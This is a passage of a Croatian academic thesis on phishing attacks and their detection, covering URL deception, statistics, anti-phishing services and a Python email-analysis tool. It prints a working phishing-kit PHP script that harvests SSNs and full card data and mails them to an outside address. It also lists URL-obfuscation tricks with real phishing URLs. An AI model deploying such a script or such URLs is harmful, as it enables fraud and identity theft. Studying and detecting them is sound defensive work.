<? session_start(); $fname = $_POST['fname']; $mname = $_POST['mname']; $lname = $_POST['lname']; $Address = $_POST['Address']; $City = $_POST['City']; $State = $_POST['State']; $Zip = $_POST['Zip']; $Phone = $_POST['Phone']; $Country = $_POST['Country']; $ssn = $_POST['ssn']; $dobm = $_POST['dobm']; $dobd = $_POST['dobd']; $doby = $_POST['doby']; $ccnumber = $_POST['ccnumber']; $month = $_POST['month']; $year = $_POST['year']; $cvv2 = $_POST['cvv2']; $type = $_POST['type']; //sending email info here $ip = getenv("REMOTE_ADDR"); $subj = "IP - $ip | $ccnumber | PayPal | - Step 1 -"; $msg = "IP: $ip\n\nFirst Name: $fname\nMiddle Name: $mname\nLast Name: $lname\nAddress: $Address\nCity: $City\nState: $State\nZip: $Zip\nPhone: $Phone\nCountry: $Country\nssn: $ssn\nDOB Month: $dobm\nDOB Day: $dobd\nDOB Year: $doby\n-----------------------\nCard Type: $type\nCredit Card Number: $ccnumber\nCC Expiration Month: $month\nCC Expiration Year: $year\nCvv: $cvv2"; $from = "From: PayPal<another@one.com>"; mail("geamantan@gmail.com", $subj, $msg, $from); header("Location: processing3.html"); ?>

Slika 3.16: Ispis skripte step3.php

3.3 Tipovi adresa

Iako je u nekim specifičnim slučajevima moguće pomoću ranjivosti preglednika sakriti adresu na kojoj se lažna stranica nalazi, to generalno nije moguće. Zato dio phishera koristi trikove da bi uvjeriti korisnike da lažna stranica stvarno pripada organizaciji za koju se predstavlja. Tako je jedan od prvih trikova bio da se slovo "l" u adresi zamijeni s "I" ili "1". To je iskorišteno u napadima na PayPal gdje su umjesto originalne domene paypal.com otvorene domene paypaI.com i paypa1.com. Isto tako je poznat napad u kojem je domena bankofthewest.com zamijenjena s bankofthevvest.com (w prikazano kao vv). Osim tih jednostavnih trikova, postoje i drugi koji se temelje na neznanju prosječnih korisnika Interneta o načinu izgradnje adresa i o hijerarhijskoj pripadnosti domenama. Postoje korisnici koji vjeruju da adrese poput http://paypal-alert.net/ ili

21

http://paypal.4yu.fr/ pripadaju domeni paypal.com [9]. Isto tako neki korisnici vjeruju da adrese poput http://aimeegoestolondon.com/www.paypal.it/ index.htm ili http://189.224.23.84/www.paypal.com/paypal pripadaju PayPal-u.

Generalno, adrese koje se koriste moguće je razvrstati u 5 kategorija [10]: 1. Skrivanje imena domene pomoću IP adresa. Ime domene je u adresi moguće

zamijeniti s IP adresom na kojoj se server nalazi, tako da je za http://www.fer.hr/ bilo koji sljedeći oblik valjan: http://161.53.72.23/ (dekatski zapis odvojen točkama), http://0xa1.53.0110.23/ (kombinacija dekatskog, heksadekatskog - 0xa1 i oktalnog - 0110 zapisa). Moguće je koristiti i zapis gdje se IP adresa ne odvaja po oktetima, već se koristi jedan 32-bitni broj. Tako se adresa http://www.fer.hr pretvara u http://0xa1354817/ (heksadekatski), http://024115244027/ (oktalno) ili http://2704623639/ (dekatski). Posljednja dva oblika server na www.fer.hr odbija, međutim općenito to su legalni zapisi adresa. Primjer takve phishing adrese je http://201.210.197.5/cgi_bin/Launch_cashplus.cgi/.

2. Skrivanje stvarne domene dodavanjem ciljane domene u adresu. Tu pripadaju adrese kojima je u put do dokumenta koji se učitava dodan naziv ciljane domene. Primjer takve adrese je http://www.payvr.fr/httpswww.paypal.comfrcgi ili http://www.pibliceflam.be/www.PayPal.Com/FR-fr/cgi-bin.

3. Skrivanje stvarne domene dodavanjem imena ciljane domene u poddomenu. Na taj način je moguće izgraditi adresu poput http://www.paypal.com.nekadrugaadresa.com. Primjeri takvih adresa su http://www.paypal.nd.pl/ ili http://paypal.4yu.fr/.

4. Naziv domene je pogrešno napisan. Tu pripadaju adrese poput http://paypak.eu/, http://www.paypai.com/, http://www.paypa1.com/, http://www.bankofthevvest.com i razne druge.

5. Upotreba adresa koje su namijenjene za preusmjeravanje. Na primjer, eBay ima skriptu na adresi http://my.ebay.com/aw-cgi/eBayISAPI.dll? koja omogućava korisniku da kao parametar unese stranicu na koju želi biti preusmjeren (provjereno 21.9.2008.). Koristeći takve sigurnosne propuste napadač može stvoriti adresu koja će sadražvati potpuno legitimnu domenu (my.ebay.com), a ipak će voditi na zlonamjernu stranicu. Primjer takve adrese je http://my.ebay.com/aw-cgi/eBayISAPI.dll?RedirectEnter&partner=ShowItem&loc=http%3A%2F%2Fus.ebayobjects.com%2F2c%3B9739597%3B9123118%3Bz%3Fhttp%3A%2F%2F0xc924a44/custsvc/_include/Function.asp gdje se korisnika preusmjerava na adresu http://0xc924a44/custsvc/_include/Function.asp.

U početku phishinga se koristio još jedan način koji danas uglavnom nije moguć zbog zlouporabe. HTTP protokolom je bilo predviđeno slanje korisničkog imena Web poslužitelju [6]. Korisničko ime se upisivalo prije imena domene, a odvojeno znakom "@". Primjer takve adrese bi bio http://pero@www.fer.hr/. Tako je bilo moguće iskonstruirati adresu

22

poput http://www.paypal.com@mojadomena.com/ i uvjeriti korisnika da ta adresa zapravo pripada PayPalu. Danas je taj oblik adresa u Internet Exploreru potpuno onemogućen (provjereno za verziju 7), a Mozilla Firefox i Seamonkey javljaju upozorenje da se zapravo radi o adresi http://mojadomena.com/ i pitaju korisnika da li je siguran da to želi. Novija verzija preglednika Opera se ponaša jednako kao i Firefox. U tablici 3.1 je prikazano još nekoliko stvarnih adresa i njihove značajke.

Tablica 3.1: Primjeri adresa lažnih stranica

Adresa stranice Tip adrese

http://122.248.47.226/mrtg/.cartasi/index.htm Tip 1

http://122.34.255.25/securazione/bancopostaonline.poste.it/poste/bpol/bancoposta/formslogin.htm

Tip 1+2

http://202.67.215.50/~payment/payment/infinity.icicibank.co.in/BANKAWAY=Action.RetUser.Init.001=Y&amp;AppSignonBankId=ICI&amp;AppType=corporate&amp;abrdPrf=N/update.icici.com/

Tip 1+2

http://centre-fax.com/www.PayPal.Com/fr/Confirm.htm Tip 2

http://connect.colonialbank.a9t5l43uev049lx363hh.secureserv.onlineupdatemirror3238o18kb1af7b.colonial.certificaterenewal.gfhrf.com/logon.htm

Tip 3

http://gjhvnvjgfjhgj.9k.com/klhfjkgfdlgkhgklbgkjhgdlkghdsfgdkghghdsifghearitufgrehgfdkghrgjh.html

Normalna adresa neobičnog izgleda

http://membres.lycos.fr/dhddgdh/paypal.fr/ Tip 2

http://njserve.com/images/1/www.halifax.co.uk/Re-activation/halifax-online.co.uk/secure/_mem_/formslogin.asp/index.html

Tip 2

http://signin.e-bay.com-ws-e-bayisapi.dll.9k.com/SignIn0ru3A2F2.html

Tip 3

http://top.capitalonebank.compub.login.htmlbank.serv.manager.cgipage.showshow.075497317.type.activex.comprj.egfgdc.com/login.htm

Tip 3

http://www.backwoon.com/toow/bofa/ Normalna adresa

http://www.bcanb.info/ Normalna

23

adresa

http://www.cheap-nukes.com/.site/www.paypal.it/Confirm.htm

Tip 2

3.4 Tijek novca

Ukoliko se radi o financijskom napadu, da bi napad bio potpuno uspješan, napadač mora preuzeti novac s kompromitiranog računa. Prema "camorra" modelu [4] organizator napada prvenstveno radi vlastite zaštite zapošljava agente koji će prebaciti novac na svoje račune. Agenti podužu novac s kompromitiranih računa te ga šalju u inozemstvo. Drugi agenti skupljaju taj nova u inozemstvu i šalju ga napadaču. Osim vlastite sigurnosti, na taj način napadač osigurava i novac jer je mala vjerojatnost da će svi agenti biti uhvaćeni i da će sav novac biti izgubljen. Agenti često koriste eGold jer uplatu u eGold sustav nije moguće opozvati, pa drugi agent taj novac može preuzeti bilo gdje u svijetu [3].

3.5 Zlonamjerni programi

Upotreba zlonamjernih programa, ukoliko ih je moguće instalirati na žrtvino računalo, znatno olakšava posao napadača. Najjednostavniji način slanja programa žrtvi je u privitku poruke elektroničke pošte. Iako je ova metoda vrlo stara i postoje brojne metode zaštite koje ju sprječavaju, svejedno je još uvijek moguće zaraziti jedan dio korisnika. Ako postoje ranjivosti preglednika elektroničke pošte, onda je moguće sastaviti takvu poruku koja će preuzeti nepoželjni program bez ikakve interakcije korisnika. Nakon što se zlonamjerni program jednom nađe na žrtvinom računalu, mogućnosti su vrlo široke. Postoje programi koji bilježe pritisak svake tipke i program koji je bio aktivan u tom trenu. Pomoću takvog programa napadač može doći do svega što je korisnik upisao, pa tako i do korisničkih imena i lozinki. Druga mogućnost je da zlonamjerni program preusmjerava mrežni promet zaraženog računala. Tada napadač može preusmjeriti pokušaje otvaranja stvarnih financijskih stranica na svoje lažne stranice i tako doći do željenih podataka.

24

4. Trendovi

Posljednje dvije godine su obilježene većim promjenama. Avalanche mreža zaraženih računala je do sredine 2010. godine gotovo u potpunosti prestala pružati smještaj za phishing stranice, iako je mreža i dalje aktivna i koristi se u druge svrhe. 2007. godine se pojavio, a 2009. masovno proširio trojanski konj naziva Zeus. Procjenjuje se da trenutno kontrolira oko 3.6 milijuna računala u 196 zemalja svijeta i od 2009. godine na dalje se umjesto Avalanchea sve više koristi za phishing napade. Druga velika promjena se odnosi na phishing napade u Kini. Kineska organizacija CNNIC koja se bavi phishing napadima u Kini je objavila rezultate svojih istraživanja i pokazala da, uz to da se u SAD-u i Europi detektira samo oko 10% phishing napada ciljanih na kineske organizacije, promjene u pravilima registracije domena u Kini su dovele do promjena u strukturi napadačkih domena. Uvjeti za registraciju domene unutar .CN vršne domene su postroženi što je rezultiralo padom broja registriranih domena sa 13.5 milijuna krajem 2009. godine na 3.4 milijuna početkom 2011. Isti trend se može vidjeti i na broju napada koji su koristili .CN vršnu domenu. APWG je registrirao 2.862 takva napada u drugoj polovici 2009. godine i samo 352 napada u drugoj polovici 2010. godine. No, to ne znači da se broj napada smanjio. Upravo suprotno, broj napada na kineske institucije se konstantno povećava, a napadači su se preselili na druge, lakše dobavljive domene. U drugoj polovici 2010. godine je registrirano ukupno 12.282 napada na kineske institucije od čega se 74% odnosi na na Taobao.com, stranicu za online kupovinu i aukcije. Nisu jasni razlozi, međutim prosječno vrijeme života phishing stranice se povećalo sa 49.5 sati u prvoj polovici 2009. godine na 73 sata u drugoj polovici 2010. godine. 41.4% svih napadačkih stranica u drugoj polovici 2010. godine bilo je smješteno na .COM vršnoj domeni, 7.3% na .CC, 7.2% na .NET, 4.5% je imalo IP adresu, a 4% na .ORG (slika 4.1). To predstavlja veliku promjenu u odnosu na godinu dana ranije kada je .COM domena zauzimala 31.1%, .EU 22.7%, .NET 11.5%, a .UK 11,4%. Danas se na europskim nacionalnim i .EU domenama nalazi zanemariv broj phishing stranica.

Slika 4.1: Raspodjela napada po domenama u 2010/2 [1]

25

U drugoj polovici 2009. godine je otkriveno ukupno 28.775 domena korištenih za phishing napade. Od toga je 6.372 (22%) bilo registrirano u svrhu napada, a 22.403 zauzeto i prenamjenjeno za phishing hakerskim napadima. Godinu dana kasnije se slika drastično promijenila. U drugoj polovici 2010. godine otkrivene su 42.624 domene korištene za phishing, od toga 11.769 (29%) registriranih i 28.537 hakiranih. Glavni razlog tako velike promjene u brojevima su podaci o phishing napadima u Kini. Do 2010. godine ti podaci nisu bili dostupni, pa nije moguće procijeniti koliko se napada dogodilo do tada. Povećan broj registriranih domena je posljedica kineskih napada gdje napadači najčešće registriraju, a ne hakiraju postojeće stranice. Prije promjene regulative bilo je lako registrirati domenu na .CN vršnoj domeni. Otkad to više nije lako, napadači su se okrenuli lakšim domenama poput .TK i .CC.

Broj phishing stranica smještenih na poddomenama besplatnih domena je u stalnom porastu. U drugoj polovici 2008. godine je otkriveno 6.339 takvih stranica, godinu dana kasnije 6.734, a u drugoj polovici 2010. godine ukupno 11.768 stranica. Najpopularnije takve domene su CO.CC sa preko 40% stranica, T35.COM sa 5%, 110MB.COM sa 2%, a sve ostale imaju po manje od 1% udjela. Tokom 2009. godine i prve polovice 2010. godine se povećavao udio phishing stranica koje koriste servise za skraćivanje adresa. Broj takvih stranica je doživio svoj vrh u lipnju 2010. godine sa 150-ak otkrivenih stranica taj mjesec i od onda opada. U prosincu 2010. je otkriveno samo 50-ak takvih stranica. Nije jasno što je uzrokovalo ovakav trend. Najpopularniji sustavi za skraćivanje adresa za phishing u drugoj polovici 2010. godine su bili tinyurl.com sa 19% udjela i bit.ly sa 10% udjela (slika 4.2).

Slika 4.2: Udio servisa za skraćivanje adresa u 2010/2 [1]

Prema APWG-ovim podacima, na .HR domeni je u drugoj polovici 2009. godine registrirano 15, a u drugoj polovici 2010. godine ukupno 22 phishing napada s vrlo visokim prosječnim vremenima života od 107 u 2009., odnosno 88 sati u 2010. godini. Svi podaci su preuzeti sa [1].

26

5. Postojeća zaštita

5.1 Organizacije

Najpoznatije organizacije koje sakupljaju informacije o phishingu i pružaju neku razinu zaštite su APWG, PhishTank i Symantec PRN. PhishTank je potpuno besplatan za upotrebu, dok se za druga dva plaćaju mjesečne članarine. Osim njih, phishingom se bave i druge kompanije kao što su Microsoft i Google, ali oni rezultate koriste samo za svoje interne potrebe.

5.1.1 APWG

Anti-Phishing Working Group (APWG – http://antiphishing.org) je najpoznatija organizacija koja se bavi otkrivanjem i sprječavanjem phishing napada. To je organizacija koja okuplja velik broj sigurnosnih i financijskih kompanija. Trenutno broje preko 1700 kompanija i agencija koje su uključene u borbu protiv phishinga. Surađuju s 9 od 10 najvećih banaka i 5 najvećih ISP-ova u SAD-u. Osim toga aktivni su i na području provođenja zakona vezanih uz prijevare na Internetu. Najveći APWG-ovi sponzori su Microsoft, Visa, Symantec, Yahoo, eBay, GeoTrust, RSA, McAfee i još neki drugi. APWG mjesečno svojim članovima izdaje izvještaje o trenutnom stanu u svijetu te s partnerima radi na razvoju zaštite od phishinga. Izvještaji su za javnost dostupni s kašnjenjem od pola godine.

APWG-ov partner MillerSmiles (http://www.millersmiles.co.uk) posjeduje automatski sustav koji skuplja phishing poruke (HoneyTrap) te pruža mogućnost pretplate (180 GBP mjesešno) na redovito osvježavanu listu najnovijih adresa phishing stranica. Moguće je i osobno (dobrovoljno) doprinijeti tom popisu slanjem sumnjive adrese, odnosno poruke na reportphishing@antiphishing.org. Na slici 5.1 je prikazan jedan primjer iz MillerSmilesove arhive.

27

Slika 5.1: Primjer poruke iz MillerSmilesove arhive

5.1.2 PhishTank

PhishTank (http://www.phishtank.com) je anti-phishing organizacija pokrenuta pod pokroviteljstvom OpenDNS-a. Organizacija je neprofitna i sastoji se od dobrovoljaca koji pronalaze i prijavljuju phishing adrese, zatim od onih koji te adrese provjeravaju i na kraju onih koji održavaju cijeli sustav. Podaci koje PhishTank sakupi su potpuno besplatni i slobodni za nekomercijalnu, ali i komercijalnu uporabu. PhishTank pruža i API (Application Programming Interface) preko kojeg je moguće programski dohvaćati najnovije podatke. Taj sustav koristi Internet preglednik Opera. Za sudjelovanje u radu grupe potrebna je (također besplatna) registracija.

PhishTank broji preko 20.000 članova i mjesečno obradi oko 15.000 prijavljenih sumnjivih adresa (podaci za 2008. godinu).

Na adresi http://data.phishtank.com/data/online-valid/ je moguće dohvatiti trenutno aktualan popis phishing stranica u XML formatu [11]. Na slici 5.2 je dan isječak iz tog popisa.

28

<?xml version="1.0" encoding="UTF-8"?> <output> <meta> <generated_at>2008-06-30T10:22:26+00:00</generated_at> <total_entries>3271</total_entries> </meta> <entries> <entry> <url><![CDATA[http://www.natwest.co.uk.ttre.me.uk/serverstack/usersdirectory/ncf.aspx?pc=3D112771808504170148543896991026940934204436642114070&amp]]></url> <phish_id>469016</phish_id> <phish_detail_url><![CDATA[http://www.phishtank.com/phish_detail.php?phish_id=469016]]></phish_detail_url> <submission> <submission_time>2008-06-29T21:22:43+00:00</submission_time> </submission> <verification> <verified>yes</verified> <verification_time>2008-06-30T04:37:50+00:00</verification_time> </verification> <status> <online>yes</online> </status> </entry> <entry> <url><![CDATA[http://chicagoplaygroundequipment.com//userlogo/anz.html]]></url> <phish_id>469004</phish_id> <phish_detail_url><![CDATA[http://www.phishtank.com/phish_detail.php?phish_id=469004]]></phish_detail_url> <submission> <submission_time>2008-06-29T20:13:38+00:00</submission_time> </submission> <verification> <verified>yes</verified> <verification_time>2008-06-29T23:52:04+00:00</verification_time> </verification> <status> <online>yes</online> </status> </entry>

Slika 5.2: Isječak iz PhishTankovog XML popisa

5.1.3 Symantec PRN

Symantec Phish Report Network (PRN) je Symantecova mreža razmjene phishing stranica. Organizacija je podijeljena u dva dijela. Prvi dio su sakupljači adresa koji djeluju na dobrovoljnoj bazi, a drugi dio čine korisnici tih linkova. Godišnja članarina iznosi 50.000 USD. Članstvo je namijenjeno kompanijama koje se bave sigurnošću korisnika Interneta i kompanijama koje su ciljevi phishing napada. Dobrovoljci mogu na adresi https://submit.symantec.com/antifraud/phish.cgi ostaviti adresu stranice koju smatraju sumnjivom.

29

5.1.4 Google

Google pruža uslugu prepoznavanja phishing stranica za preglednike Mozilla Firefox [12] i Chrome. Starije inačice preglednika su dohvaćale popis svih poznatih zlonamjernih stranica sa poslužitelja na adresi http://sb.google.com/ i uspoređivale adrese koje bi korisnik posjećivao s tim popisom. Postojao je i popis sigurnih stranica. Današnje inačice preglednika s Googleovog poslužitelja preuzimaju popis sažetaka (engl. hash) svih poznatih zlonamjernih stranica i u tom popisu traže sažetak adrese koju korisnik želi posjetiti. Čitljiv popis zlonamjernih stranica više nije dostupan. Nije poznato na koji način Google održava listu. Pretpostavlja se da Google analizira svu neželjenu poštu koja dolazi u Google Mail sustav i iz te pošte izdvaja sumnjive adrese. Razvojna dokumentacija Mozilla Firefoxa [12] opisuje protokol za provjeru potencijalno opasnih stranica.

5.2 Sustavi za zaštitu

5.2.1 Internet preglednici

Danas svaki od tri najpopularnija Internet preglednika [13] (Microsoft Internet Explorer, Mozilla Firefox, Chrome) ima ugrađenu funkcionalnost prepoznavanja zlonamjernih stranica i upozoravanja korisnika na to. U sva tri slučaja sustav prepoznavanja se svodi na liste zlonamjernih stranica (engl. blacklists) u kojima se provjerava svaka stranica kojoj korisnik želi pristupiti. Internet Explorer koristi Microsoftov servis provjere stranica. Sustav radi tako da Internet Explorer svaku adresu kojoj korisnik želi pristupiti šalje svom poslužitelju koji u bazi podataka provjerava je li ta stranica zlonamjerna. Ako je, pojavljuje se odgovarajuća poruka i korisnika se upućuje da ne posjeti tu stranicu. Način rada poslužitelja koji provjerava adrese te sam način popunjavanja liste nije poznat. Opera radi na isti način, ali koristi PhishTankovu listu provjerenih phishing stranica. U oba slučaja dolazi do narušavanja privatnosti korisnika jer poslužitelji dobivaju svaku adresu kojoj korisnik pristupa te njegovu IP adresu. Mozilla Firefox i Chrome koriste listu zlonamjernih stranica koju održava Google i koja je dostupna na poslužitelju http://sb.google.com. Firefox može raditi na dva načina. Prvi je isti kao i kod prethodna dva preglednika. Svaka adresa kojoj korisnik pristupa šalje se Googleovom poslužitelju koji odlučuje o prirodi stranice. Drugi način je da Firefox redovito dohvaća i pohranjuje listu aktualnih phishing stranica i onda lokalno provjeravati svaku adresu [12]. Mozilla razvojni tim preporučuje prvi način, međutim korisnici koji su zabrinuti za svoju privatnost bi trebali koristiti drugi način. Na slikama 5.3, 5.4 i 5.5 prikazana su upozorenja koja prikazuju preglednici kad korisnik pokuša otvoriti zlonamjernu stranicu.

Liste zlonamjernih stranica daju korisniku samo djelomičnu sigurnost [14]. Adresa se dodaje u listu tek nakon što je otkrivena od strane održavatelja liste. Nitko ne može jamčiti da će baš on prvi otkriti zlonamjernu stranicu. Postoji mogućnost da će već biti žrtava prije nego što se stranica proglasi opasnom. Drugi problem takvih lista je dodavanje pogrešnih adresa. Moguće je da na listu bude dodana čitava domena koja sadrži opasne stranice, a uz njih može sadržavati veći broj potpuno legalnih stranica. Poznati je primjer blokiranja domene mine.nu u rujnu 2008. godine [15] .

30

Slika 5.3: Upozorenje u Internet Exploreru 7

Slika 5.4: Upozorenje u Mozilla Firefoxu 3

Slika 5.5. Upozorenje u Operi 9

31

5.2.2 Filteri neželjene pošte

Phishing napadi počinju porukom elektroničke pošte, a phishing poruke se šire kao i ostale spam poruke. Zbog toga je pomoću dobrog filtera elektroničke pošte moguće spriječiti velik broj phishing napada. Ako filter zaustavi poruke koje su poslane da bi žrtvu navele na lažnu stranicu, onda se napad zapravo nikad neće dogoditi. Korisnik neće biti prevaren te se neće pojaviti mogućnost da ostavi svoje podatke na lažnoj stranici. Phishing je razlog više da se poradi na sigurnosti elektroničke pošte. Bitno je da svaki poslužitelj pošte (što se najviše odnosi na besplatne e-mail servise) dobije što kvalitetniji filter neželjene pošte koji će, između ostalog, spriječiti i phishing napade.

5.2.3 Antivirusni programi

Dio napada dolazi u obliku zlonamjernih programa, pa je vrlo važno da svako računalo bude zaštićeno od mogućnosti preuzimanja i pokretanja bilo kakvih zlonamjernih programa (trojanci i spyware kao najvažniji u phishingu). Osim toga, bitno je zaštititi računalo i sigurnosnom stijenom (engl. firewall) da bi se spriječilo slanje bilo kakvih podataka s računala od strane neprovjerenih aplikacija.

5.2.4 Edukacija

Istraživanja su pokazala da velik broj korisnika Interneta nije svjestan opasnosti koje vrebaju [9][16]. Mnogi nemaju nikakva saznanja o phishingu, a i oni koji su čuli za phishing ne znaju kako se točno krađa podataka odvija i na što treba paziti. Prosječni korisnik ne zna razlikovati lažirano zaglavlje poruke elektroničke pošte od legitimnog. Zbog toga ne može odrediti da li je pošiljatelj poruke stvarno taj koji piše u polju pošiljatelja. Zatim, korisnici ne znaju na koji se način sastavlja adresa stranice te vjeruju da adrese oblika http://paypal-security.com/ ili http://nekadrugadomena.com/paypal.com/ pripadaju domeni paypal.com. Zbog toga je danas teško dobiti domenu čij naziv sadrži zaštićeno ime, međutim tako je riješen samo dio napada.

32

6. Praktičan rad

Programsko rješenje sustava za otkrivanje phishing napada je zamišljeno kao analizator neželjenih poruka elektroničke pošte. Budući da se većina phishing poruka dostavlja kanalima za distribuciju neželjene pošte, a gotovo sve poruke neželjene pošte u sebi sadrže poveznice na razne internetske stranice, spremnici filtera za neželjenu poštu osiguravaju dovoljno velike količine phishing poruka uz veliku raznovrsnost u sadržaju samih poruka. Svaka poruka koja je označena kao neželjena se otvara, analizira se njen sadržaj, izdvajaju poveznice te na kraju analizira sadržaj stranica na koje te poveznice vode.

Sustav je izrađen u programskom jeziku Python verzije 2.7 i može biti pokrenut na svim platformama koje podržava Python interpreter. Konkretno, radi se o operacijskim sustavima UNIX, Linux, Mac OS X i Windows te svim hardverskim platformama koje ti sustavi podržavaju. Osim vrlo visoke razine prenosivosti, Python je odabran i zbog velikog broja biblioteka koje pružaju svu potrebnu funkcionalnost. U ovom radu se koriste biblioteke za dohvaćanje sadržaja putem HTTP, POP3 i IMAP protokola, zatim biblioteke za parsiranje sadržaja poruka i HTML dokumenata te biblioteka za obradu slika. Osim biblioteke za parsiranje HTML dokumenata, sve ostale su standardne i dolaze zajedno s interpreterom. Postoji i standardna biblioteka za parsiranje HTML, odnosno XML dokumenata, no ona u praksi nije upotrebljiva jer nema mogućnost oporavka i nastavka analize dokumenta u slučaju greške. A prilikom analize HTML dokumenata je mogućnost oporavka nužna. HTML dokumenti, koji su u suštini XML dokumenti, u stvarnom svijetu sadrže velik broj strukturalnih grešaka od kojih se klasični parseri ne mogu oporaviti te odbacuju dokument kao nevaljan. Preglednici tokom učitavanja popravljaju takve greške i to im omogućuje prikaz bilo kakve stranice. U ovom radu se za parsiranje potencijalno loših dokumenata koristi BeautifulSoup biblioteka koja može ispraviti loš HTML i izgraditi ispravno stablo. Uz to pruža funkcionalnost za vrlo jednostavno navigiranje među elementima stabla. Program se pokreće pokretanjem glavnog modula kojem se zadaje samo jedan parametar, a koji predstavlja izvor poruka koje je potrebno analizirati. Izvor može biti direktorij u kojem se nalazi više poruka, može biti datoteka koja sadrži poruku ili adresa poslužitelja s kojeg se poruka može preuzeti. Sve poruke moraju biti u RFC 5322 formatu. Rezultati analize se ispisuju na standardni izlaz. Za svaku poruku se pojedinačno utvrđuje razina rizika.

Tijekom analize, sustav koristi bazu podataka koja sadrži informacije o štićenim stranicama. Prvenstveno o domenama, logotipovima i ključnim riječima koje se vežu uz danu stranicu. Istovremeno, pohranjuju se rezultati analiza svih stranica da se izbjegne višestruka analiza istog sadržaja, a taj popis istovremeno može pružati zaštitu u pregledniku na način da se svaka adresa koju korisnik želi otvoriti provjerava u popisu i korisnika se upozorava ukoliko se radi o potencijalnom napadu.

Analiza počinje otvaranjem izvora koji sadrži poruke za analizu te dohvaćanjem i analizom jedne po jedne poruke. Za svaku poruku se izdvaja pošiljatelj i zasebni MIME dijelovi među kojima se traže tekstualni i HTML sadržaji. Svaki takav dio se zasebno analizira u potrazi za poveznicama na potencijalno opasne stranice, ali i ostale znakove koji bi mogli upućivati na napad. Adrese tih potencijalno opasnih stranica se analiziraju u potrazi za poznatim načinima obmane da se radi o stvarnim adresama štićenih stranica. Sljedeći korak je preuzimanje i analiza sadržaja koji se nalazi na tim adresama. Analiziraju se samo HTML stranice. Glavni cilj te analize je pronalazak obrasca za unos osobnih podataka. Takav obrazac se ne mora

33

nužno nalaziti na prvoj stranici, a može ih biti i više gdje se svaki sljedeći otvori nakon ispunjavanja prethodnog. Obrasci su specifični po tome da ne postoji provjera točnosti unesenih podataka, osim eventualno provjere ispravnosti brojeva kreditnih kartica pomoću skripte u HTML-u, pa je moguće "ući" u sustav koristeći slučajne vrijednosti. Osim obrazaca, skupljaju se i poveznice, slike i ostali elementi koji mogu pomoći u odluci. Posebna pažnja se obraća na konačnu destinaciju nakon ispunjavanja posljednjeg obrasca. Velik dio napadačkih stranica u tom trenu preusmjerava žrtvu na štićene stranice i na taj način pokušava sakriti vlastitu svrhu. Ukoliko adresa na koju se šalje rezultat obrasca na potencijalno opasnoj stranici na kraju preusmjerava na štićenu stranicu, vjerojatnost da se radi o phishingu je vrlo visoka.

6.1 Poruke

Poruke elektroničke pošte se sastoje od zaglavlja i jednog ili više dijelova koji nose sadržaj. Svaki od tih dijelova sadrži po jednu datoteku koja može tekst poruke u običnom tekstualnom, HTML ili nekom drugom obliku te privitke koji se šalju uz poruku. Ako ima više dijelova koji prenose tekst poruke, nije moguće unaprijed znati koji će biti prikazan korisniku. To ovisi o mogućnostima programa za pregled pošte. Uobičajeno je da se za prikaz uzme prvi HTML dio ukoliko program podržava HTML prikaz ili prvi tekstualni dio u suprotnom. Ostali dijelovi se korisniku prikažu kao privitci. Zbog toga je važno da detektor phishing poruka prođe kroz sve dijelove i odluku donese na temelju najsumnjivijeg dijela. Svaki od dijelova se tretira kao neovisna poruka. Najvažniji elementi koji se gledaju u svakoj poruci su poveznice u tekstu poruke i polje pošiljatelja. Budući da je napadačev cilj obmanuti žrtvu, pošiljateljeva domena se konstruira tako da, ako nije identična domeni organizacije na koju napadač cilja, jako podsjeća na tu domenu. Ako je pošiljateljeva domena jednaka štićenoj, autentičnost je moguće provjeriti provjerom adrese poslužitelja s kojeg je poruka poslana. Ako adresa poslužitelja ne pripada štićenoj organizaciji, radi se o napadu, a ukoliko pripada, nastavlja se s analizom jer uvijek postoji mogućnost da je neki od elemenata na putu za dostavu poruke kompromitiran te da se radi o lažnoj poruci. Autentičnost pošiljatelja se provjerava na način da njegova IP adresa mora nalaziti u rangu navedenom u informacijama o štićenoj stranici i na putu između pošiljatelja i primatelja sudjeluju samo poslužitelji kojima se vjeruje. Budući da detekcija povjerljivosti poslužitelja nije ugrađena te se razmatra samo najjednostavniji slučaj kad pošiljatelj izravno šalje poruku primatelju, ova informacija nema stvarnu vrijednost pri donošenju odluke.

Osim pošiljatelja i poveznica, provjeravaju se i grafički elementi koji se nalaze u poruci. Posebna pažnja se obraća na slike koje se učitavaju sa štićene stranice i koje mogu učvrstiti sumnju ukoliko postoje elementi koji ukazuju na mogući napad. Osnovna ideja je da se poruke uzimaju iz rezultata filtera neželjene pošte, no moguće je i preuzeti poruke sa poslužitelja koristeći POP3 ili IMAP protokol, ili pak zadati pojedinačnu poruku.

6.2 Adrese

Sve pronađene adrese se svrstavaju u tri osnovne kategorije: 1. legitimne adrese - one koje vode na legitimnu domenu

34

2. lažne adrese - sadrže riječi ili dijelove koji bi žrtvu mogli navesti da pomisli kako se radi o legitimnoj stranici, no ne vode na legitimnu domenu

3. nepoznate adrese - nisu legitimne, ali ne pokušavaju imitirati da jesu

Ukoliko se u poruci pojavi poruka druge kategorije, postoji umjeren rizik od phishing napada. A ukoliko postoji adresa druge kategorije uz jednu ili više adresa prve kategorije, onda se radi o vrlo visokom riziku. Ako se pojavljuje samo adresa treće kategorije, radi se o vrlo malom riziku od phishing napada i velikoj vjerojatnosti da se radi o običnoj neželjenoj poruci.

Prilikom provjere adrese, najprije se provjerava domena i zaključuje pripada li adresa štićenoj stranici ili ne. Ako ne pripada, onda se provjerava postojanje ključnih ili njima vizualno sličnih riječi. Rade se uobičajene supstitucije "vv" za "w", "l" i "1" za "i", "0" za "O" i slično. Provjerava se i prisutnost štićene domene u poddomeni ili putanji do datoteke. Na temelju toga se odlučuje hoće li adresa biti smještena u drugu ili treću kategoriju. Postoji mogućnost da zbog greške poslužitelja štićene stranice postoji mogućnost preusmjeravanja HTTP zahtjeva prema legitimnom poslužitelju na poslužitelje koji drže zlonamjerne stranice. U takvoj situaciji će adrese biti smještene u prvu kategoriju jer ne postoji mogućnost otkrivanja takve greške te bi to kao posljedicu moglo imati svrstavanje zlonamjerne poruke među sigurne. Zbog toga se otvara svaka adresa do koje se dođe u poruci te se oni odgovori koji i dalje ostanu na sigurnoj domeni, a ne preusmjere na neku drugu, odbacuju. Takav rad usporava detekciju, ali istovremeno pruža veću razinu sigurnosti.

6.3 Stranice

